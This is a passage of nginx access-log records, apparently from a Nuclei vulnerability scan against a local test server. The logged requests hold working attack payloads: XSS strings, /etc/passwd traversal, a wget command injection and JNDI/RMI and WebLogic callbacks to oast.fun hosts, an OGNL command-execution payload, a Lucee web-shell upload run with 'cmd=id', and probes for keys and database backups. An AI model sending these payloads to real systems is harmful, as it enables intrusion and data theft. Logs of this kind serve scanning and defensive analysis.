"http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/swipehq-payment-gateway-woocommerce/test-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"&act=sync&task_number=1;wget http://c9v8h8gsmpv8c1qg07h0gp7s9kcp46y6o.oast.fun","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /en/php/usb_sync.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sqlite HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /start.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?action=Login&module=Users&print=a&%22%2F%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/nagios3/status.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?page=pie-register&show_dash_widget=1&invitaion_code=PC9zY3JpcHQ+PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"loginwith=suslogin&username=webadmin&password=webadmin&submit=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /webadmin/index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.048","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth/?next=%2F HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.181","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /package.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.180","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sqlitedb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /www/start.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /install.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.196","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /general/login.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.185","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /kvmlm2/index.dhtml?fname=&language=../../../../../../../../../../etc/passwd%00.jpg&lname=&sponsor=gdi&template=11 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /client/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /package-lock.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"age_gate%5Bd%5D=10&age_gate%5Bm%5D=10&age_gate%5By%5D=1990&age_gate%5Bremember%5D=1&age_gate%5Bage%5D=TVRnPQ%3D%3D&action=age_gate_submit&age_gate%5Bnonce%5D=48f2b89fed&_wp_http_referer=https://attacker.com","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-post.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"imgSrc=\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A
Command:value=\x22#form.cmd#\x22>
Options: value=\x22#form.opts#\x22>
Timeout: value=\x22#form.timeout#\x22\x0D\x0A value=\x225\x22>
\x0D\x0A\x0D\x0A
\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A
\x0D\x0A#HTMLCodeFormat(myVar)#\x0D\x0A
\x0D\x0A
\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /lucee/admin/imgProcess.cfm?file=/../../../context/297MTkOGAoxajqEj68TGbxXzWqL.cfm HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.184","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sql.7z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"{\x22username\x22:\x22nuclei_297MTynvjJflJWEhSpKSaZuSaRq\x22,\x22password\x22:\x22297MTtbG1A39nS7SiflDnbRHAD8\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/user/signup/step2 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /update.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_fragment?_path=_controller=phpcredits&flag=-1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.188","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"username=test&password=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login.action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /car1/estimateresult/result?s=&serviceestimatekey=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sql.bz2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/experimental/patternfile?order=id%3Bselect(md5('nuclei'))&page=0&page_size=0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //example.com/%2f.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.184","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"cmd=id&opts=&timeout=5","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /lucee/297MTkOGAoxajqEj68TGbxXzWqL.cfm HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php?go=go%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&contactId=contactId%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&campaignId=campaignId%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E& HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.066","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ccm-web/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"{\x0D\x0A \x22@type\x22:\x22com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig\x22,\x0D\x0A \x22properties\x22:{\x0D\x0A \x22@type\x22:\x22java.util.Properties\x22,\x0D\x0A \x22UserTransaction\x22:\x22rmi://c9v8h8gsmpv8c1qg07h0k1g18ib7ge4cs.oast.fun/Exploit\x22\x0D\x0A }\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.201","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sql.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.057","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/File/DownloadFile?filePath=wwwroot/..././/..././/..././/..././/..././/..././/..././/..././etc/passwd&delete=0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console/images/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://c9v8h88smpv8c1ig07h07wnhxgtp5j3xd.oast.fun') HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.180","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /build.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /s/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.058","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/embed-swagger/swagger-iframe.php?url=xss://%22-alert(document.domain)-%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"var oShell = WScript.CreateObject('WScript.Shell');var oExec = oShell.Exec(\x22cmd /c whoami\x22);","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PUT /meta HTTP/1.1","status":"405","body_bytes_sents":"584","req_time":"1.193","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php/%3C/script%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E/?page=cnss_social_icon_page HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sql.lz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /resource/file%3a///etc/passwd/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /js/../../../../../../../../etc/passwd%00.jpg HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /host.key HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.203","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 